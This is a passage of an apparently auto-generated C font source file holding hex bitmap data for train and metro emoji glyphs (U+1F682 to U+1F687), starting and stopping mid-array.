0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x7,
0xc0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0x0, 0x0, 0x7f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0x9c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x3, 0x0, 0x70, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x7, 0x0, 0x0, 0x30,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x7, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
/* U+1F682 "🚂" */
0x0, 0x0, 0x7e, 0x7f, 0xcf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0xf0, 0x78, 0x1e, 0x1e, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x40, 0x30,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x6, 0x0, 0x0, 0x0, 0x0, 0x30, 0x0, 0x0,
0x0, 0x30, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xc0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0, 0xff,
0xfe, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x7,
0xff, 0xf0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x3b, 0xff, 0x80, 0xe0, 0x70, 0x0, 0x0, 0x0,
0x1, 0xdf, 0xfe, 0xf, 0xff, 0x0, 0x0, 0x0,
0x0, 0xe, 0x7f, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x73, 0xfe, 0x7e, 0xe, 0x0, 0x0,
0x0, 0x0, 0x1, 0xcf, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x3f, 0x0, 0x0, 0x3f,
0xff, 0xff, 0xf8, 0x0, 0x19, 0xf0, 0x0, 0x1,
0xff, 0xff, 0xff, 0xc0, 0x0, 0xff, 0x0, 0x0,
0x7, 0xff, 0xff, 0xfc, 0x0, 0x3, 0xf8, 0x0,
0x0, 0x1f, 0xff, 0xff, 0xe0, 0x0, 0xf, 0x80,
0x0, 0x0, 0xc0, 0x0, 0x7, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x6, 0x0, 0x0, 0x38, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x30, 0x0, 0x1, 0xc0, 0x0,
0x1f, 0x0, 0x0, 0x1, 0x80, 0xf8, 0xe, 0x0,
0x0, 0xf8, 0x0, 0x0, 0xc, 0x1f, 0xf0, 0x70,
0x0, 0x7, 0xc0, 0x0, 0x0, 0x60, 0xc1, 0xc3,
0x80, 0x0, 0x3e, 0x0, 0x0, 0x3, 0xe, 0x6,
0x1c, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x18, 0x60,
0x30, 0xe0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xc3,
0x1, 0x87, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x6,
0x18, 0xc, 0x38, 0x0, 0x3, 0xe0, 0x0, 0x0,
0xf0, 0xc0, 0x61, 0xc0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0x86, 0x3, 0xe, 0x0, 0x7, 0xff, 0xff,
0xff, 0xfc, 0x30, 0x18, 0x70, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xe1, 0x80, 0xc3, 0x80, 0x3, 0xff,
0xc0, 0xe0, 0x7f, 0xc, 0x6, 0x1c, 0x0, 0x1f,
0xde, 0x7, 0x3, 0xf8, 0x7f, 0xf0, 0xe0, 0x1,
0xfe, 0x70, 0x38, 0x1f, 0xc3, 0xff, 0x87, 0x0,
0x1f, 0xf3, 0x81, 0xc0, 0xfe, 0x0, 0x0, 0x38,
0x0, 0xff, 0x9c, 0xe, 0x7, 0xf0, 0x0, 0x1,
0xc0, 0x7, 0xfc, 0xe0, 0x70, 0x3f, 0x80, 0x0,
0xe, 0x0, 0x1f, 0xff, 0x3, 0x81, 0xff, 0xff,
0xff, 0xf8, 0x0, 0x7f, 0xf8, 0x1c, 0xf, 0xff,
0xff, 0xff, 0xc0, 0x3, 0xff, 0xc0, 0xe0, 0x7f,
0x0, 0x0, 0x1c, 0x0, 0xf, 0xfc, 0x7, 0x7,
0xf8, 0x0, 0x0, 0xe0, 0x0, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x7e,
0x3, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xf,
0xe0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0,
0xff, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0x80,
0xf, 0xf8, 0x0, 0xf, 0xff, 0xff, 0xff, 0xfc,
0x0, 0xef, 0xc0, 0x0, 0x3f, 0xff, 0xff, 0xff,
0xe0, 0xe, 0x7e, 0x0, 0xf8, 0x7f, 0xff, 0xff,
0xff, 0x0, 0x77, 0xf0, 0x7, 0xf3, 0xc1, 0xe1,
0xc0, 0xf8, 0x7, 0x3f, 0x80, 0x7f, 0xff, 0x1f,
0x9f, 0xf, 0xc0, 0x71, 0xff, 0xff, 0xff, 0xcd,
0xdf, 0xee, 0xce, 0x3, 0x1b, 0xff, 0xff, 0xfe,
0x3c, 0xfe, 0x3c, 0x70, 0x38, 0xc3, 0xff, 0xfc,
0x71, 0xc7, 0x31, 0xe3, 0x83, 0x86, 0x3f, 0xff,
0xf3, 0x9b, 0xb9, 0x9d, 0x98, 0x18, 0x61, 0xc7,
0xe1, 0x9f, 0x8f, 0xcf, 0xc7, 0xc1, 0xc3, 0xc,
0x3f, 0xc, 0x78, 0x3c, 0x3c, 0x1e, 0x1c, 0x18,
0x73, 0xfc, 0xe1, 0xe1, 0xc1, 0xe1, 0xe1, 0xff,
0xc1, 0xf8, 0x7f, 0x7, 0xfc, 0x3, 0xfe, 0x1f,
0xff, 0x7, 0x81, 0xe0, 0xf, 0x80, 0xf, 0xc0,
/* U+1F683 "🚃" */
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc3, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x30,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x30, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc3, 0x7,
0xff, 0xf, 0xfe, 0x1f, 0xf8, 0x3f, 0xf0, 0x30,
0xc1, 0xff, 0xc3, 0xff, 0x87, 0xfe, 0xf, 0xfc,
0xc, 0x30, 0x60, 0x70, 0xc0, 0xe1, 0x81, 0x83,
0x3, 0x3, 0xc, 0x18, 0x1c, 0x30, 0x38, 0x60,
0x60, 0xc0, 0xc0, 0xc3, 0x6, 0x7, 0xc, 0xe,
0x18, 0x18, 0x30, 0x30, 0x30, 0xc1, 0x81, 0xc3,
0x3, 0x86, 0x6, 0xc, 0xc, 0xc, 0x30, 0x60,
0x70, 0xc0, 0xe1, 0x81, 0x83, 0x3, 0x3, 0xc,
0x18, 0x1c, 0x30, 0x38, 0x60, 0x60, 0xc0, 0xc0,
0xc3, 0x6, 0x7, 0xc, 0xe, 0x18, 0x18, 0x30,
0x30, 0x30, 0xc1, 0xff, 0xc3, 0xff, 0x87, 0xfe,
0xf, 0xfc, 0xc, 0x30, 0x7f, 0xf0, 0xff, 0xe1,
0xff, 0x83, 0xff, 0x3, 0xc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc3, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x30, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc3,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x30, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc3, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x30,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xc3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf3, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x38,
0x38, 0x70, 0x70, 0x7, 0x3, 0xe, 0x7, 0x0,
0xe, 0xe, 0x1c, 0x1c, 0x0, 0xc0, 0xc3, 0x81,
0xc0, 0x3, 0x83, 0x87, 0x7, 0x0, 0x38, 0x70,
0x60, 0xe0, 0x0, 0x71, 0xc0, 0xe3, 0x80, 0xe,
0x3c, 0x1c, 0x78, 0x0, 0xf, 0xe0, 0x1f, 0xc0,
0x1, 0xfe, 0x3, 0xfc, 0x0, 0x1, 0xf0, 0x3,
0xe0, 0x0, 0x1e, 0x0, 0x3c, 0x0,
/* U+1F684 "🚄" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xf8,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xb8,
0xe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x38,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x3c,
0x3, 0x80, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x1c,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x1c,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x1c,
0x0, 0x70, 0x0, 0x0, 0x0, 0x7, 0xc0, 0x1c,
0x0, 0x38, 0x0, 0x0, 0x0, 0xf, 0x80, 0x3c,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x3c,
0x0, 0xe, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x3c,
0x0, 0x7, 0x0, 0x0, 0x0, 0x3e, 0x0, 0x3c,
0x0, 0x3, 0x80, 0x0, 0x0, 0x3e, 0x0, 0x78,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x7c, 0x0, 0xf8,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x7c, 0x0, 0xf0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x78, 0x1, 0xf0,
0x0, 0x0, 0x38, 0x0, 0x0, 0xf8, 0x3, 0xe0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0xf8, 0xf, 0xc0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xf0, 0x1f, 0x80,
0x0, 0x0, 0x7, 0x0, 0x0, 0xf0, 0x7f, 0x0,
0x0, 0x0, 0x3, 0x80, 0x1, 0xf1, 0xfe, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x1, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x1, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x1, 0xff, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x81, 0xe0, 0x60, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc1, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0xe0, 0xfc, 0x0,
0x0, 0x7f, 0xff, 0xff, 0xf0, 0xf0, 0x7c, 0x0,
0xf, 0xff, 0xff, 0xff, 0xf8, 0xf0, 0x7c, 0x0,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x70, 0x1c, 0x3,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x70, 0x0, 0xf,
0xff, 0xf8, 0x0, 0x0, 0x7, 0x78, 0x0, 0x3f,
0xfe, 0x0, 0x0, 0x0, 0x3, 0xb8, 0x0, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x1, 0xdc, 0x1, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x7, 0xff,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x9f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x18,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0xc,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xe,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0x8e,
0x0, 0x0, 0x0, 0x1, 0xf8, 0xf3, 0xff, 0xc6,
0x0, 0x0, 0x0, 0x1, 0xfc, 0x31, 0xff, 0xe7,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xff, 0xf3,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x7f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
0x0,
/* U+1F685 "🚅" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0,
0x30, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x18, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0,
0xc, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x6, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0x3, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0x81, 0x80, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x30,
0xc0, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x18,
0x60, 0x60, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xc,
0x30, 0x30, 0x0, 0x0, 0x0, 0x1, 0xe0, 0xc,
0x18, 0x18, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x6,
0xc, 0xc, 0x0, 0x0, 0x0, 0x7, 0xff, 0xff,
0xfe, 0x6, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xff,
0xff, 0x3, 0x0, 0x0, 0x1, 0xff, 0x0, 0x0,
0x0, 0x1, 0x80, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xc0, 0x0, 0xf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x60, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x30, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x18, 0x0, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0x83, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xc3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xe3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xf1, 0xd8, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xf9, 0xcc, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xfd, 0xe6, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xfe, 0xe3, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0x71, 0x87, 0x80, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xf0, 0xc7, 0xe0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xf8, 0x63, 0xf0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xfc, 0x31, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3e, 0x18, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xc, 0x3c, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x86, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x6, 0xe3, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x71, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xbc, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xcf, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x63, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x3f, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x81, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x70,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x30,
0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xfc, 0x38,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xfe, 0x1c,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0x1c,
0x0, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0x8e,
0x0, 0x0, 0x0, 0xfc, 0x70, 0xff, 0xff, 0xce,
0x0, 0x0, 0x0, 0x6e, 0x10, 0x7f, 0xff, 0xe7,
0xff, 0xff, 0xff, 0xf3, 0x80, 0x60, 0x0, 0x1,
0xff, 0xff, 0xff, 0xf1, 0xe0, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0,
/* U+1F686 "🚆" */
0x0, 0x1, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xc0, 0x1, 0xff, 0xe0, 0x0,
0x1f, 0xfc, 0x0, 0xfc, 0x0, 0x0, 0x0, 0x7e,
0x0, 0x60, 0x0, 0x0, 0x0, 0x3, 0x0, 0x30,
0x0, 0x0, 0x0, 0x1, 0x80, 0x18, 0x0, 0x0,
0x0, 0x0, 0xc0, 0xc, 0x0, 0x0, 0x0, 0x0,
0x60, 0x6, 0x3, 0xfe, 0x1f, 0xf8, 0x30, 0x3,
0x1, 0xff, 0xf, 0xfc, 0x18, 0x1, 0x81, 0xff,
0x87, 0xfe, 0xc, 0x0, 0xc0, 0xff, 0xc3, 0xff,
0x6, 0x0, 0x60, 0x7f, 0xe1, 0xff, 0x83, 0x0,
0x30, 0x3f, 0xf0, 0xff, 0xc1, 0x80, 0x18, 0x1f,
0xf8, 0x7f, 0xe0, 0xc0, 0xc, 0xf, 0xfc, 0x3f,
0xf0, 0x60, 0x6, 0x0, 0x0, 0x0, 0x0, 0x30,
0x3, 0x0, 0x0, 0x0, 0x0, 0x18, 0x1, 0x80,
0x0, 0x0, 0x0, 0xc, 0x0, 0xc0, 0x38, 0x0,
0xc, 0x6, 0x0, 0x60, 0x3c, 0x0, 0xf, 0x3,
0x0, 0x30, 0x1e, 0x0, 0x7, 0x81, 0x80, 0x18,
0x7, 0x0, 0x1, 0x80, 0xc0, 0xc, 0x0, 0x0,
0x0, 0x0, 0x60, 0x6, 0x0, 0x0, 0x0, 0x0,
0x30, 0x3, 0xf0, 0x0, 0x0, 0x1, 0xf8, 0x1,
0xff, 0xc0, 0x0, 0xf, 0xfc, 0x0, 0xdf, 0xff,
0x0, 0xff, 0xf6, 0x0, 0x60, 0x7f, 0xff, 0xff,
0x3, 0x0, 0x30, 0x1, 0xff, 0xf0, 0x1, 0x80,
0x18, 0x0, 0x7, 0x0, 0x0, 0xc0, 0xc, 0x3c,
0x0, 0x0, 0x3c, 0x60, 0x6, 0x3f, 0x0, 0x0,
0x1e, 0x30, 0x3, 0x1f, 0x80, 0x0, 0x1f, 0x98,
0x1, 0x8f, 0xc0, 0x0, 0x7, 0x8c, 0x0, 0xc3,
0xc0, 0x0, 0x3, 0xc6, 0x0, 0x60, 0x0, 0x0,
0x0, 0x3, 0x0, 0x30, 0x0, 0x0, 0x0, 0x1,
0x80, 0x18, 0x0, 0x0, 0x0, 0x0, 0xc0, 0xc,
0x0, 0x0, 0x0, 0x0, 0x60, 0x7, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x3, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x1, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x60, 0x0,
0x0, 0x0, 0x3, 0x0, 0x30, 0x0, 0x0, 0x0,
0x1, 0x80, 0x18, 0x0, 0x0, 0x0, 0x0, 0xc0,
0xc, 0x0, 0x0, 0x0, 0x0, 0x60, 0x6, 0x0,
0x0, 0x0, 0x0, 0x30, 0x3, 0x0, 0x0, 0x0,
0x0, 0x18, 0x1, 0x80, 0x0, 0x0, 0x0, 0xc,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x3e, 0x0, 0x1f,
0xff, 0xf7, 0xff, 0xfc, 0x0, 0xf, 0x1f, 0xff,
0xff, 0xe, 0x0, 0xf, 0x7, 0xff, 0xff, 0x87,
0x80, 0xf, 0x83, 0xff, 0xff, 0xc1, 0xe0, 0x7,
0x81, 0xff, 0xff, 0xf0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x7f, 0xff, 0xff, 0x83, 0xc1, 0xf0, 0x3f,
0xff, 0xff, 0xc1, 0xf1, 0xf8, 0x1f, 0xff, 0xff,
0xe0, 0xfc, 0xf8, 0x1f, 0xff, 0xff, 0xf8, 0x3e,
0x7c, 0xf, 0xff, 0xff, 0xfc, 0x1f, 0x0,
/* U+1F687 "🚇" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x0, 0x1f, 0xf8, 0x0, 0x0, 0xff, 0xc0,
0x0, 0x0, 0x1f, 0xe0, 0x0, 0x0, 0xf, 0xf0,
0x0, 0x0, 0x3f, 0xc0, 0x0, 0x0, 0x1, 0xfe,
0x0, 0x0, 0x3f, 0x81, 0xc7, 0xfc, 0x38, 0x3f,
0x80, 0x0, 0x3f, 0x87, 0xe6, 0x3a, 0x1f, 0xf,
0xe0, 0x0, 0x1f, 0xc7, 0xf1, 0x1d, 0xf, 0xc7,
0xf0, 0x0, 0x1f, 0xc7, 0x98, 0xff, 0x86, 0x71,
0xfc, 0x0, 0x1f, 0xe3, 0xc, 0x0, 0x3, 0x18,
0xff, 0x0, 0x1f, 0xe3, 0x86, 0x0, 0x1, 0x8e,
0x3f, 0xc0, 0xf, 0xf1, 0x83, 0x0, 0x0, 0xc3,
0x1f, 0xe0, 0xf, 0xf8, 0xc1, 0x80, 0x0, 0x61,
0x8f, 0xf8, 0x7, 0xfc, 0x60, 0xcf, 0xfc, 0x30,
0xc7, 0xfc, 0x7, 0xfe, 0x30, 0x67, 0xfe, 0x18,
0x63, 0xff, 0x3, 0xff, 0x18, 0x33, 0x1, 0xc,
0x31, 0xff, 0x83, 0xff, 0x8c, 0x19, 0x80, 0x86,
0x18, 0xff, 0xe1, 0xff, 0xc6, 0xc, 0xc0, 0x43,
0xc, 0x7f, 0xf1, 0xff, 0xe3, 0x6, 0x60, 0x21,
